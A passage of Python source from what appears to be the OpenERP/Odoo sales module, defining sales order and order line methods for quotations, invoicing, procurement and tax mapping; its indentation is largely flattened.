'note': lambda self, cr, uid, context: self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id.sale_note,
'team_id': lambda s, cr, uid, c: s._get_default_team_id(cr, uid, c),
}
_sql_constraints = [
('name_uniq', 'unique(name, company_id)', 'Order Reference must be unique per Company!'),
]
_order = 'date_order desc, id desc'
# Form filling
def unlink(self, cr, uid, ids, context=None):
sale_orders = self.read(cr, uid, ids, ['state'], context=context)
unlink_ids = []
for s in sale_orders:
if s['state'] in ['draft', 'cancel']:
unlink_ids.append(s['id'])
else:
                raise osv.except_osv(_('Invalid Action!'), _('In order to delete a confirmed sales order, you must cancel it first!'))
return osv.osv.unlink(self, cr, uid, unlink_ids, context=context)
def copy_quotation(self, cr, uid, ids, context=None):
        new_id = self.copy(cr, uid, ids[0], context=context)
        view_ref = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'sale', 'view_order_form')
        view_id = view_ref and view_ref[1] or False
        return {
            'type': 'ir.actions.act_window',
            'name': _('Sales Order'),
            'res_model': 'sale.order',
            'res_id': new_id,
'view_type': 'form',
'view_mode': 'form',
'view_id': view_id,
'target': 'current',
'nodestroy': True,
}
def onchange_pricelist_id(self, cr, uid, ids, pricelist_id, order_lines, context=None):
context = context or {}
if not pricelist_id:
return {}
value = {
'currency_id': self.pool.get('product.pricelist').browse(cr, uid, pricelist_id, context=context).currency_id.id
}
if not order_lines or order_lines == [(6, 0, [])]:
return {'value': value}
warning = {
'title': _('Pricelist Warning!'),
            'message': _('If you change the pricelist of this order (and possibly the currency), prices of existing order lines will not be updated.')
}
return {'warning': warning, 'value': value}
def get_salenote(self, cr, uid, ids, partner_id, context=None):
        context_lang = dict(context or {})
if partner_id:
partner_lang = self.pool.get('res.partner').browse(cr, uid, partner_id, context=context).lang
context_lang.update({'lang': partner_lang})
return self.pool.get('res.users').browse(cr, uid, uid, context=context_lang).company_id.sale_note
def onchange_delivery_id(self, cr, uid, ids, company_id, partner_id, delivery_id, fiscal_position, context=None):
r = {'value': {}}
if not fiscal_position:
if not company_id:
company_id = self._get_default_company(cr, uid, context=context)
fiscal_position = self.pool['account.fiscal.position'].get_fiscal_position(cr, uid, company_id, partner_id, delivery_id, context=context)
if fiscal_position:
r['value']['fiscal_position'] = fiscal_position
return r
def onchange_partner_id(self, cr, uid, ids, part, context=None):
if not part:
return {'value': {'partner_invoice_id': False, 'partner_shipping_id': False, 'payment_term': False, 'fiscal_position': False}}
part = self.pool.get('res.partner').browse(cr, uid, part, context=context)
addr = self.pool.get('res.partner').address_get(cr, uid, [part.id], ['delivery', 'invoice', 'contact'])
pricelist = part.property_product_pricelist and part.property_product_pricelist.id or False
payment_term = part.property_payment_term and part.property_payment_term.id or False
dedicated_salesman = part.user_id and part.user_id.id or uid
val = {
'partner_invoice_id': addr['invoice'],
'partner_shipping_id': addr['delivery'],
'payment_term': payment_term,
'user_id': dedicated_salesman,
}
delivery_onchange = self.onchange_delivery_id(cr, uid, ids, False, part.id, addr['delivery'], False, context=context)
val.update(delivery_onchange['value'])
if pricelist:
val['pricelist_id'] = pricelist
sale_note = self.get_salenote(cr, uid, ids, part.id, context=context)
if sale_note: val.update({'note': sale_note})
return {'value': val}
def create(self, cr, uid, vals, context=None):
if context is None:
context = {}
if vals.get('name', '/') == '/':
vals['name'] = self.pool.get('ir.sequence').next_by_code(cr, uid, 'sale.order') or '/'
if vals.get('partner_id') and any(f not in vals for f in ['partner_invoice_id', 'partner_shipping_id', 'pricelist_id', 'fiscal_position']):
defaults = self.onchange_partner_id(cr, uid, [], vals['partner_id'], context=context)['value']
if not vals.get('fiscal_position') and vals.get('partner_shipping_id'):
delivery_onchange = self.onchange_delivery_id(cr, uid, [], vals.get('company_id'), None, vals['partner_id'], vals.get('partner_shipping_id'), context=context)
defaults.update(delivery_onchange['value'])
vals = dict(defaults, **vals)
ctx = dict(context or {}, mail_create_nolog=True)
new_id = super(sale_order, self).create(cr, uid, vals, context=ctx)
self.message_post(cr, uid, [new_id], body=_("Quotation created"), context=ctx)
return new_id
def button_dummy(self, cr, uid, ids, context=None):
return True
# FIXME: deprecated method, overriders should be using _prepare_invoice() instead.
# can be removed after 6.1.
def _inv_get(self, cr, uid, order, context=None):
return {}
def _prepare_invoice(self, cr, uid, order, lines, context=None):
"""Prepare the dict of values to create the new invoice for a
sales order. This method may be overridden to implement custom
invoice generation (making sure to call super() to establish
a clean extension chain).
:param browse_record order: sale.order record to invoice
        :param list(int) lines: list of invoice line IDs that must be
attached to the invoice
:return: dict of value to create() the invoice
"""
if context is None:
context = {}
journal_ids = self.pool.get('account.journal').search(cr, uid,
[('type', '=', 'sale'), ('company_id', '=', order.company_id.id)],
limit=1)
if not journal_ids:
raise osv.except_osv(_('Error!'),
_('Please define sales journal for this company: "%s" (id:%d).') % (order.company_id.name, order.company_id.id))
invoice_vals = {
'name': order.client_order_ref or '',
'origin': order.name,
'type': 'out_invoice',
'reference': order.client_order_ref or order.name,
'account_id': order.partner_id.property_account_receivable.id,
'partner_id': order.partner_invoice_id.id,
'journal_id': journal_ids[0],
'invoice_line': [(6, 0, lines)],
'currency_id': order.pricelist_id.currency_id.id,
'comment': order.note,
'payment_term': order.payment_term and order.payment_term.id or False,
'fiscal_position': order.fiscal_position.id or order.partner_id.property_account_position.id,
'date_invoice': context.get('date_invoice', False),
'company_id': order.company_id.id,
'user_id': order.user_id and order.user_id.id or False,
            'team_id': order.team_id.id
}
# Care for deprecated _inv_get() hook - FIXME: to be removed after 6.1
invoice_vals.update(self._inv_get(cr, uid, order, context=context))
return invoice_vals
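    # The docstring above invites downstream modules to override
    # _prepare_invoice(). A minimal sketch of such an override follows; it is
    # kept as a comment so this module's behavior is unchanged, and the class
    # name and appended note are hypothetical:
    #
    #     class sale_order_custom(osv.osv):
    #         _inherit = 'sale.order'
    #
    #         def _prepare_invoice(self, cr, uid, order, lines, context=None):
    #             vals = super(sale_order_custom, self)._prepare_invoice(
    #                 cr, uid, order, lines, context=context)
    #             vals['comment'] = (vals.get('comment') or '') + '\nGenerated from %s' % order.name
    #             return vals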
def _make_invoice(self, cr, uid, order, lines, context=None):
inv_obj = self.pool.get('account.invoice')
obj_invoice_line = self.pool.get('account.invoice.line')
if context is None:
context = {}
invoiced_sale_line_ids = self.pool.get('sale.order.line').search(cr, uid, [('order_id', '=', order.id), ('invoiced', '=', True)], context=context)
from_line_invoice_ids = []
for invoiced_sale_line_id in self.pool.get('sale.order.line').browse(cr, uid, invoiced_sale_line_ids, context=context):
for invoice_line_id in invoiced_sale_line_id.invoice_lines:
if invoice_line_id.invoice_id.id not in from_line_invoice_ids:
from_line_invoice_ids.append(invoice_line_id.invoice_id.id)
for preinv in order.invoice_ids:
if preinv.state not in ('cancel',) and preinv.id not in from_line_invoice_ids:
for preline in preinv.invoice_line:
inv_line_id = obj_invoice_line.copy(cr, uid, preline.id, {'invoice_id': False, 'price_unit': -preline.price_unit})
lines.append(inv_line_id)
inv = self._prepare_invoice(cr, uid, order, lines, context=context)
inv_id = inv_obj.create(cr, uid, inv, context=context)
data = inv_obj.onchange_payment_term_date_invoice(cr, uid, [inv_id], inv['payment_term'], time.strftime(DEFAULT_SERVER_DATE_FORMAT))
if data.get('value', False):
inv_obj.write(cr, uid, [inv_id], data['value'], context=context)
inv_obj.button_compute(cr, uid, [inv_id])
return inv_id
def print_quotation(self, cr, uid, ids, context=None):
'''
        This function prints the sales order and marks it as sent, so that the next step of the workflow can be seen more easily
'''
assert len(ids) == 1, 'This option should only be used for a single id at a time'
self.signal_workflow(cr, uid, ids, 'quotation_sent')
return self.pool['report'].get_action(cr, uid, ids, 'sale.report_saleorder', context=context)
def manual_invoice(self, cr, uid, ids, context=None):
""" create invoices for the given sales orders (ids), and open the form
view of one of the newly created invoices
"""
mod_obj = self.pool.get('ir.model.data')
# create invoices through the sales orders' workflow
inv_ids0 = set(inv.id for sale in self.browse(cr, uid, ids, context) for inv in sale.invoice_ids)
self.signal_workflow(cr, uid, ids, 'manual_invoice')
inv_ids1 = set(inv.id for sale in self.browse(cr, uid, ids, context) for inv in sale.invoice_ids)
# determine newly created invoices
new_inv_ids = list(inv_ids1 - inv_ids0)
res = mod_obj.get_object_reference(cr, uid, 'account', 'invoice_form')
        res_id = res and res[1] or False
return {
'name': _('Customer Invoices'),
'view_type': 'form',
'view_mode': 'form',
'view_id': [res_id],
'res_model': 'account.invoice',
'context': "{'type':'out_invoice'}",
'type': 'ir.actions.act_window',
'nodestroy': True,
'target': 'current',
'res_id': new_inv_ids and new_inv_ids[0] or False,
}
def action_view_invoice(self, cr, uid, ids, context=None):
'''
        This function returns an action that displays the existing invoices of the given sales order ids. It can either be in a list or in a form view, if there is only one invoice to show.
'''
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
result = mod_obj.get_object_reference(cr, uid, 'account', 'action_invoice_tree1')
id = result and result[1] or False
result = act_obj.read(cr, uid, [id], context=context)[0]
#compute the number of invoices to display
inv_ids = []
for so in self.browse(cr, uid, ids, context=context):
inv_ids += [invoice.id for invoice in so.invoice_ids]
#choose the view_mode accordingly
if len(inv_ids)>1:
result['domain'] = "[('id','in',["+','.join(map(str, inv_ids))+"])]"
else:
res = mod_obj.get_object_reference(cr, uid, 'account', 'invoice_form')
result['views'] = [(res and res[1] or False, 'form')]
result['res_id'] = inv_ids and inv_ids[0] or False
return result
def test_no_product(self, cr, uid, order, context):
for line in order.order_line:
            if line.product_id and (line.product_id.type != 'service'):
return False
return True
    def action_invoice_create(self, cr, uid, ids, grouped=False, states=None, date_invoice=False, context=None):
if states is None:
states = ['confirmed', 'done', 'exception']
res = False
invoices = {}
invoice_ids = []
invoice = self.pool.get('account.invoice')
obj_sale_order_line = self.pool.get('sale.order.line')
partner_currency = {}
        # If a date was specified, use it as the invoice date; useful when invoices are generated this month
        # but must be dated on the last day of the previous month
if date_invoice:
context = dict(context or {}, date_invoice=date_invoice)
for o in self.browse(cr, uid, ids, context=context):
currency_id = o.pricelist_id.currency_id.id
            if (o.partner_id.id in partner_currency) and (partner_currency[o.partner_id.id] != currency_id):
raise osv.except_osv(
_('Error!'),
_('You cannot group sales having different currencies for the same partner.'))
partner_currency[o.partner_id.id] = currency_id
lines = []
for line in o.order_line:
if line.invoiced:
continue
elif (line.state in states):
lines.append(line.id)
created_lines = obj_sale_order_line.invoice_line_create(cr, uid, lines)
if created_lines:
invoices.setdefault(o.partner_invoice_id.id or o.partner_id.id, []).append((o, created_lines))
if not invoices:
for o in self.browse(cr, uid, ids, context=context):
for i in o.invoice_ids:
if i.state == 'draft':
return i.id
for val in invoices.values():
if grouped:
res = self._make_invoice(cr, uid, val[0][0], reduce(lambda x, y: x + y, [l for o, l in val], []), context=context)
invoice_ref = ''
origin_ref = ''
for o, l in val:
invoice_ref += (o.client_order_ref or o.name) + '|'
origin_ref += (o.origin or o.name) + '|'
self.write(cr, uid, [o.id], {'state': 'progress'})
cr.execute('insert into sale_order_invoice_rel (order_id,invoice_id) values (%s,%s)', (o.id, res))
self.invalidate_cache(cr, uid, ['invoice_ids'], [o.id], context=context)
                #remove the trailing '|' from invoice_ref and origin_ref
if len(invoice_ref) >= 1:
invoice_ref = invoice_ref[:-1]
if len(origin_ref) >= 1:
origin_ref = origin_ref[:-1]
invoice.write(cr, uid, [res], {'origin': origin_ref, 'name': invoice_ref})
else:
for order, il in val:
res = self._make_invoice(cr, uid, order, il, context=context)
invoice_ids.append(res)
self.write(cr, uid, [order.id], {'state': 'progress'})
cr.execute('insert into sale_order_invoice_rel (order_id,invoice_id) values (%s,%s)', (order.id, res))
self.invalidate_cache(cr, uid, ['invoice_ids'], [order.id], context=context)
return res
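    # Usage sketch (comment only; cr, uid and order_ids are assumed to come
    # from the caller, e.g. a wizard): invoicing several orders of the same
    # partner as a single draft invoice goes through grouped=True, optionally
    # forcing the invoice date:
    #
    #     invoice_id = self.pool.get('sale.order').action_invoice_create(
    #         cr, uid, order_ids, grouped=True, date_invoice='2015-02-28')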
def action_invoice_cancel(self, cr, uid, ids, context=None):
self.write(cr, uid, ids, {'state': 'invoice_except'}, context=context)
return True
def action_invoice_end(self, cr, uid, ids, context=None):
for this in self.browse(cr, uid, ids, context=context):
for line in this.order_line:
if line.state == 'exception':
line.write({'state': 'confirmed'})
if this.state == 'invoice_except':
this.write({'state': 'progress'})
return True
def action_cancel(self, cr, uid, ids, context=None):
if context is None:
context = {}
sale_order_line_obj = self.pool.get('sale.order.line')
account_invoice_obj = self.pool.get('account.invoice')
for sale in self.browse(cr, uid, ids, context=context):
for inv in sale.invoice_ids:
if inv.state not in ('draft', 'cancel'):
raise osv.except_osv(
_('Cannot cancel this sales order!'),
_('First cancel all invoices attached to this sales order.'))
inv.signal_workflow('invoice_cancel')
sale_order_line_obj.write(cr, uid, [l.id for l in sale.order_line],
{'state': 'cancel'})
self.write(cr, uid, ids, {'state': 'cancel'})
return True
def action_button_confirm(self, cr, uid, ids, context=None):
assert len(ids) == 1, 'This option should only be used for a single id at a time.'
self.signal_workflow(cr, uid, ids, 'order_confirm')
return True
def action_wait(self, cr, uid, ids, context=None):
context = context or {}
for o in self.browse(cr, uid, ids):
if not o.order_line:
raise osv.except_osv(_('Error!'),_('You cannot confirm a sales order which has no line.'))
noprod = self.test_no_product(cr, uid, o, context)
if (o.order_policy == 'manual') or noprod:
self.write(cr, uid, [o.id], {'state': 'manual', 'date_confirm': fields.date.context_today(self, cr, uid, context=context)})
else:
self.write(cr, uid, [o.id], {'state': 'progress', 'date_confirm': fields.date.context_today(self, cr, uid, context=context)})
self.pool.get('sale.order.line').button_confirm(cr, uid, [x.id for x in o.order_line])
return True
def action_quotation_send(self, cr, uid, ids, context=None):
'''
This function opens a window to compose an email, with the edi sale template message loaded by default
'''
assert len(ids) == 1, 'This option should only be used for a single id at a time.'
ir_model_data = self.pool.get('ir.model.data')
try:
template_id = ir_model_data.get_object_reference(cr, uid, 'sale', 'email_template_edi_sale')[1]
except ValueError:
template_id = False
try:
compose_form_id = ir_model_data.get_object_reference(cr, uid, 'mail', 'email_compose_message_wizard_form')[1]
except ValueError:
compose_form_id = False
ctx = dict()
ctx.update({
'default_model': 'sale.order',
'default_res_id': ids[0],
'default_use_template': bool(template_id),
'default_template_id': template_id,
'default_composition_mode': 'comment',
'mark_so_as_sent': True
})
return {
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'mail.compose.message',
'views': [(compose_form_id, 'form')],
'view_id': compose_form_id,
'target': 'new',
'context': ctx,
}
def action_done(self, cr, uid, ids, context=None):
for order in self.browse(cr, uid, ids, context=context):
self.pool.get('sale.order.line').write(cr, uid, [line.id for line in order.order_line], {'state': 'done'}, context=context)
return self.write(cr, uid, ids, {'state': 'done'}, context=context)
def _prepare_order_line_procurement(self, cr, uid, order, line, group_id=False, context=None):
date_planned = self._get_date_planned(cr, uid, order, line, order.date_order, context=context)
return {
'name': line.name,
'origin': order.name,
'date_planned': date_planned,
'product_id': line.product_id.id,
'product_qty': line.product_uom_qty,
'product_uom': line.product_uom.id,
'product_uos_qty': (line.product_uos and line.product_uos_qty) or line.product_uom_qty,
'product_uos': (line.product_uos and line.product_uos.id) or line.product_uom.id,
'company_id': order.company_id.id,
'group_id': group_id,
'invoice_state': (order.order_policy == 'picking') and '2binvoiced' or 'none',
'sale_line_id': line.id
}
def _get_date_planned(self, cr, uid, order, line, start_date, context=None):
date_planned = datetime.strptime(start_date, DEFAULT_SERVER_DATETIME_FORMAT) + timedelta(days=line.delay or 0.0)
return date_planned
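    # Worked example of the computation above: with start_date set to
    # '2015-03-01 10:00:00' and a line delay of 5.0 days, date_planned is
    # datetime(2015, 3, 6, 10, 0), i.e. the confirmation date plus the
    # delivery lead time.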
def _prepare_procurement_group(self, cr, uid, order, context=None):
return {'name': order.name, 'partner_id': order.partner_shipping_id.id}
def procurement_needed(self, cr, uid, ids, context=None):
        #when only the sale module is installed there is no need to create procurements;
        #modules installed on top of it (sale_service, sale_stock) override this behavior.
sale_line_obj = self.pool.get('sale.order.line')
res = []
for order in self.browse(cr, uid, ids, context=context):
res.append(sale_line_obj.need_procurement(cr, uid, [line.id for line in order.order_line], context=context))
return any(res)
def action_ignore_delivery_exception(self, cr, uid, ids, context=None):
for sale_order in self.browse(cr, uid, ids, context=context):
self.write(cr, uid, ids, {'state': 'progress' if sale_order.invoice_exists else 'manual'}, context=context)
return True
def action_ship_create(self, cr, uid, ids, context=None):
"""Create the required procurements to supply sales order lines, also connecting
the procurements to appropriate stock moves in order to bring the goods to the
sales order's requested location.
:return: True
"""
procurement_obj = self.pool.get('procurement.order')
sale_line_obj = self.pool.get('sale.order.line')
for order in self.browse(cr, uid, ids, context=context):
proc_ids = []
vals = self._prepare_procurement_group(cr, uid, order, context=context)
if not order.procurement_group_id:
group_id = self.pool.get("procurement.group").create(cr, uid, vals, context=context)
order.write({'procurement_group_id': group_id})
for line in order.order_line:
            #Try to fix procurements in exception (possible when, after a shipping exception, the user chooses to recreate)
if line.procurement_ids:
#first check them to see if they are in exception or not (one of the related moves is cancelled)
procurement_obj.check(cr, uid, [x.id for x in line.procurement_ids if x.state not in ['cancel', 'done']])
line.refresh()
                #re-run the procurements that are in exception in order to trigger another move
proc_ids += [x.id for x in line.procurement_ids if x.state in ('exception', 'cancel')]
procurement_obj.reset_to_confirmed(cr, uid, proc_ids, context=context)
elif sale_line_obj.need_procurement(cr, uid, [line.id], context=context):
if (line.state == 'done') or not line.product_id:
continue
vals = self._prepare_order_line_procurement(cr, uid, order, line, group_id=order.procurement_group_id.id, context=context)
proc_id = procurement_obj.create(cr, uid, vals, context=context)
proc_ids.append(proc_id)
            #Confirm the procurement orders so that the rules will be applied to them;
            #note that the workflow normally ensures proc_ids isn't an empty list
procurement_obj.run(cr, uid, proc_ids, context=context)
            #if shipping was in exception and the user chose to recreate the delivery order, write the new status of the SO
if order.state == 'shipping_except':
val = {'state': 'progress', 'shipped': False}
if (order.order_policy == 'manual'):
for line in order.order_line:
if (not line.invoiced) and (line.state not in ('cancel', 'draft')):
val['state'] = 'manual'
break
order.write(val)
return True
def onchange_fiscal_position(self, cr, uid, ids, fiscal_position, order_lines, context=None):
'''Update taxes of order lines for each line where a product is defined
:param list ids: not used
:param int fiscal_position: sale order fiscal position
:param list order_lines: command list for one2many write method
'''
order_line = []
fiscal_obj = self.pool.get('account.fiscal.position')
product_obj = self.pool.get('product.product')
line_obj = self.pool.get('sale.order.line')
fpos = False
if fiscal_position:
fpos = fiscal_obj.browse(cr, uid, fiscal_position, context=context)
for line in order_lines:
# create (0, 0, { fields })
# update (1, ID, { fields })
if line[0] in [0, 1]:
prod = None
if line[2].get('product_id'):
prod = product_obj.browse(cr, uid, line[2]['product_id'], context=context)
elif line[1]:
prod = line_obj.browse(cr, uid, line[1], context=context).product_id
if prod and prod.taxes_id:
line[2]['tax_id'] = [[6, 0, fiscal_obj.map_tax(cr, uid, fpos, prod.taxes_id)]]
order_line.append(line)
# link (4, ID)
# link all (6, 0, IDS)
elif line[0] in [4, 6]:
line_ids = line[0] == 4 and [line[1]] or line[2]
for line_id in line_ids:
prod = line_obj.browse(cr, uid, line_id, context=context).product_id
if prod and prod.taxes_id:
order_line.append([1, line_id, {'tax_id': [[6, 0, fiscal_obj.map_tax(cr, uid, fpos, prod.taxes_id)]]}])
else:
order_line.append([4, line_id])
else:
order_line.append(line)
return {'value': {'order_line': order_line}}
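    # For reference, order_lines is received as a list of one2many commands;
    # an illustrative input (ids are made up) and how it is handled:
    #
    #     [(0, 0, {'product_id': 7}),   # new line: tax_id set in the vals dict
    #      (1, 42, {'discount': 10.0}), # updated line: tax_id added to the vals
    #      (4, 43),                     # linked line: rewritten as (1, 43, {'tax_id': ...}) if taxed
    #      (6, 0, [44, 45])]            # replacement set: one (1, id, ...) per taxed
    #                                   # line, untaxed ids re-linked with (4, id)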
def test_procurements_done(self, cr, uid, ids, context=None):
for sale in self.browse(cr, uid, ids, context=context):
for line in sale.order_line:
if not all([x.state == 'done' for x in line.procurement_ids]):
return False
return True
def test_procurements_except(self, cr, uid, ids, context=None):
for sale in self.browse(cr, uid, ids, context=context):
for line in sale.order_line:
if any([x.state == 'cancel' for x in line.procurement_ids]):
return True
return False
# TODO add a field price_unit_uos
# - update it on change product and unit price
# - use it in report if there is a uos
class sale_order_line(osv.osv):
def need_procurement(self, cr, uid, ids, context=None):
        #when only the sale module is installed there is no need to create procurements;
        #modules installed on top of it (sale_service, sale_stock) override this behavior.
prod_obj = self.pool.get('product.product')
for line in self.browse(cr, uid, ids, context=context):
if prod_obj.need_procurement(cr, uid, [line.product_id.id], context=context):
return True
return False
def _amount_line(self, cr, uid, ids, field_name, arg, context=None):
tax_obj = self.pool.get('account.tax')
cur_obj = self.pool.get('res.currency')
res = {}
if context is None:
context = {}
for line in self.browse(cr, uid, ids, context=context):
price = line.price_unit * (1 - (line.discount or 0.0) / 100.0)
taxes = tax_obj.compute_all(cr, uid, line.tax_id, price, line.product_uom_qty, line.product_id, line.order_id.partner_id)
cur = line.order_id.pricelist_id.currency_id
res[line.id] = cur_obj.round(cr, uid, cur, taxes['total'])
return res
def _get_uom_id(self, cr, uid, *args):
try:
proxy = self.pool.get('ir.model.data')
result = proxy.get_object_reference(cr, uid, 'product', 'product_uom_unit')
return result[1]
        except Exception:
return False
def _fnct_line_invoiced(self, cr, uid, ids, field_name, args, context=None):
res = dict.fromkeys(ids, False)
for this in self.browse(cr, uid, ids, context=context):
res[this.id] = this.invoice_lines and \
all(iline.invoice_id.state != 'cancel' for iline in this.invoice_lines)
return res
def _order_lines_from_invoice(self, cr, uid, ids, context=None):
        # direct access to the m2m table is the least convoluted way to achieve this (and is ok ACL-wise)
cr.execute("""SELECT DISTINCT sol.id FROM sale_order_invoice_rel rel JOIN
sale_order_line sol ON (sol.order_id = rel.order_id)
WHERE rel.invoice_id = ANY(%s)""", (list(ids),))
return [i[0] for i in cr.fetchall()]
def _get_price_reduce(self, cr, uid, ids, field_name, arg, context=None):
res = dict.fromkeys(ids, 0.0)
        for line in self.browse(cr, uid, ids, context=context):
            # guard against zero quantity to avoid a ZeroDivisionError
            if line.product_uom_qty:
                res[line.id] = line.price_subtotal / line.product_uom_qty
return res
_name = 'sale.order.line'
_description = 'Sales Order Line'
_columns = {
'order_id': fields.many2one('sale.order', 'Order Reference', required=True, ondelete='cascade', select=True, readonly=True, states={'draft':[('readonly',False)]}),
'name': fields.text('Description', required=True, readonly=True, states={'draft': [('readonly', False)]}),
'sequence': fields.integer('Sequence', help="Gives the sequence order when displaying a list of sales order lines."),
'product_id': fields.many2one('product.product', 'Product', domain=[('sale_ok', '=', True)], change_default=True, readonly=True, states={'draft': [('readonly', False)]}, ondelete='restrict'),
'invoice_lines': fields.many2many('account.invoice.line', 'sale_order_line_invoice_rel', 'order_line_id', 'invoice_id', 'Invoice Lines', readonly=True, copy=False),
'invoiced': fields.function(_fnct_line_invoiced, string='Invoiced', type='boolean',
store={
'account.invoice': (_order_lines_from_invoice, ['state'], 10),
'sale.order.line': (lambda self,cr,uid,ids,ctx=None: ids, ['invoice_lines'], 10)
}),
        'price_unit': fields.float('Unit Price', required=True, digits_compute=dp.get_precision('Product Price'), readonly=True, states={'draft': [('readonly', False)]}),
        'price_subtotal': fields.function(_amount_line, string='Subtotal', digits_compute=dp.get_precision('Account')),
        'price_reduce': fields.function(_get_price_reduce, type='float', string='Price Reduce', digits_compute=dp.get_precision('Product Price')),
        'tax_id': fields.many2many('account.tax', 'sale_order_tax', 'order_line_id', 'tax_id', 'Taxes', readonly=True, states={'draft': [('readonly', False)]}),
        'address_allotment_id': fields.many2one('res.partner', 'Allotment Partner', help="A partner to whom the particular product needs to be allotted."),
        'product_uom_qty': fields.float('Quantity', digits_compute=dp.get_precision('Product UoS'), required=True, readonly=True, states={'draft': [('readonly', False)]}),
        'product_uom': fields.many2one('product.uom', 'Unit of Measure', required=True, readonly=True, states={'draft': [('readonly', False)]}),
        'product_uos_qty': fields.float('Quantity (UoS)', digits_compute=dp.get_precision('Product UoS'), readonly=True, states={'draft': [('readonly', False)]}),
        'product_uos': fields.many2one('product.uom', 'Product UoS'),
        'discount': fields.float('Discount (%)', digits_compute=dp.get_precision('Discount'), readonly=True, states={'draft': [('readonly', False)]}),
        'th_weight': fields.float('Weight', readonly=True, states={'draft': [('readonly', False)]}),
'state': fields.selection(
[('cancel', 'Cancelled'),('draft', 'Draft'),('confirmed', 'Confirmed'),('exception', 'Exception'),('done', 'Done')],
'Status', required=True, readonly=True, copy=False,
            help='* The \'Draft\' status is set when the related sales order is in draft status. \
                \n* The \'Confirmed\' status is set when the related sales order is confirmed. \
                \n* The \'Exception\' status is set when the related sales order is set as exception. \
                \n* The \'Done\' status is set when the sales order line has been picked. \
                \n* The \'Cancelled\' status is set when a user cancels the related sales order.'),
'order_partner_id': fields.related('order_id', 'partner_id', type='many2one', relation='res.partner', store=True, string='Customer'),
        'salesman_id': fields.related('order_id', 'user_id', type='many2one', relation='res.users', store=True, string='Salesperson'),
'company_id': fields.related('order_id', 'company_id', type='many2one', relation='res.company', string='Company', store=True, readonly=True),
'delay': fields.float('Delivery Lead Time', required=True, help="Number of days between the order confirmation and the shipping of the products to the customer", readonly=True, states={'draft': [('readonly', False)]}),
'procurement_ids': fields.one2many('procurement.order', 'sale_line_id', 'Procurements'),
}
_order = 'order_id desc, sequence, id'
_defaults = {
        'product_uom': _get_uom_id,
'discount': 0.0,
'product_uom_qty': 1,
'product_uos_qty': 1,
'sequence': 10,
'state': 'draft',
'price_unit': 0.0,
'delay': 0.0,
}
def _get_line_qty(self, cr, uid, line, context=None):
if line.product_uos:
return line.product_uos_qty or 0.0
return line.product_uom_qty
def _get_line_uom(self, cr, uid, line, context=None):
if line.product_uos:
return line.product_uos.id
return line.product_uom.id
def _prepare_order_line_invoice_line(self, cr, uid, line, account_id=False, context=None):
"""Prepare the dict of values to create the new invoice line for a
sales order line. This method may be overridden to implement custom
invoice generation (making sure to call super() to establish
a clean extension chain).
:param browse_record line: sale.order.line record to invoice
:param int account_id: optional ID of a G/L account to force
(this is used for returning products including service)
:return: dict of values to create() the invoice line
"""
res = {}
if not line.invoiced:
if not account_id:
if line.product_id:
account_id = line.product_id.property_account_income.id
if not account_id:
account_id = line.product_id.categ_id.property_account_income_categ.id
if not account_id:
raise osv.except_osv(_('Error!'),
_('Please define income account for this product: "%s" (id:%d).') % \
(line.product_id.name, line.product_id.id,))
else:
prop = self.pool.get('ir.property').get(cr, uid,
'property_account_income_categ', 'product.category',
context=context)
account_id = prop and prop.id or False
uosqty = self._get_line_qty(cr, uid, line, context=context)
uos_id = self._get_line_uom(cr, uid, line, context=context)
pu = 0.0
if uosqty:
pu = round(line.price_unit * line.product_uom_qty / uosqty,
self.pool.get('decimal.precision').precision_get(cr, uid, 'Product Price'))
fpos = line.order_id.fiscal_position or False
account_id = self.pool.get('account.fiscal.position').map_account(cr, uid, fpos, account_id)
if not account_id:
raise osv.except_osv(_('Error!'),
_('There is no Fiscal Position defined or Income category account defined for default properties of Product categories.'))
res = {
'name': line.name,
'sequence': line.sequence,
'origin': line.order_id.name,
'account_id': account_id,
'price_unit': pu,
'quantity': uosqty,
'discount': line.discount,
'uos_id': uos_id,
'product_id': line.product_id.id or False,
'invoice_line_tax_id': [(6, 0, [x.id for x in line.tax_id])],
'account_analytic_id': line.order_id.project_id and line.order_id.project_id.id or False,
}
return res
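    # Like sale.order._prepare_invoice(), this hook is meant to be extended by
    # downstream modules. A commented sketch with a hypothetical class name
    # (the prefix added to the description is purely illustrative):
    #
    #     class sale_order_line_custom(osv.osv):
    #         _inherit = 'sale.order.line'
    #
    #         def _prepare_order_line_invoice_line(self, cr, uid, line, account_id=False, context=None):
    #             vals = super(sale_order_line_custom, self)._prepare_order_line_invoice_line(
    #                 cr, uid, line, account_id=account_id, context=context)
    #             if vals:
    #                 vals['name'] = '[%s] %s' % (line.order_id.name, vals['name'])
    #             return vals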
def invoice_line_create(self, cr, uid, ids, context=None):
if context is None:
context = {}
create_ids = []
sales = set()
for line in self.browse(cr, uid, ids, context=context):
vals = self._prepare_order_line_invoice_line(cr, uid, line, False, context)
if vals:
inv_id = self.pool.get('account.invoice.line').create(cr, uid, vals, context=context)
self.write(cr, uid, [line.id], {'invoice_lines': [(4, inv_id)]}, context=context)
sales.add(line.order_id.id)
create_ids.append(inv_id)
# Trigger workflow events
for sale_id in sales:
workflow.trg_write(uid, 'sale.order', sale_id, cr)
return create_ids
def button_cancel(self, cr, uid, ids, context=None):
for line in self.browse(cr, uid, ids, context=context):
if line.invoiced:
raise osv.except_osv(_('Invalid Action!'), _('You cannot cancel a sales order line that has already been invoiced.'))
return self.write(cr, uid, ids, {'state': 'cancel'})
def button_confirm(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'confirmed'})
def button_done(self, cr, uid, ids, context=None):
res = self.write(cr, uid, ids, {'state': 'done'})
for line in self.browse(cr, uid, ids, context=context):
workflow.trg_write(uid, 'sale.order', line.order_id.id, cr)
return res
def uos_change(self, cr, uid, ids, product_uos, product_uos_qty=0, product_id=None):
product_obj = self.pool.get('product.product')
if not product_id:
            return {'value': {'product_uom': product_uos, 'product_uom_qty': product_uos_qty},
                    'domain': {}}
product = product_obj.browse(cr, uid, product_id)
value = {
'product_uom': product.uom_id.id,
}
# FIXME must depend on uos/uom of the product and not only of the coeff.
try:
value.update({
'product_uom_qty': product_uos_qty / product.uos_coeff,
'th_weight': product_uos_qty / product.uos_coeff * product.weight
})
except ZeroDivisionError:
pass
return {'value': value}
def create(self, cr, uid, values, context=None):
if values.get('order_id') and values.get('product_id') and any(f not in values for f in ['name', 'price_unit', 'type', 'product_uom_qty', 'product_uom']):
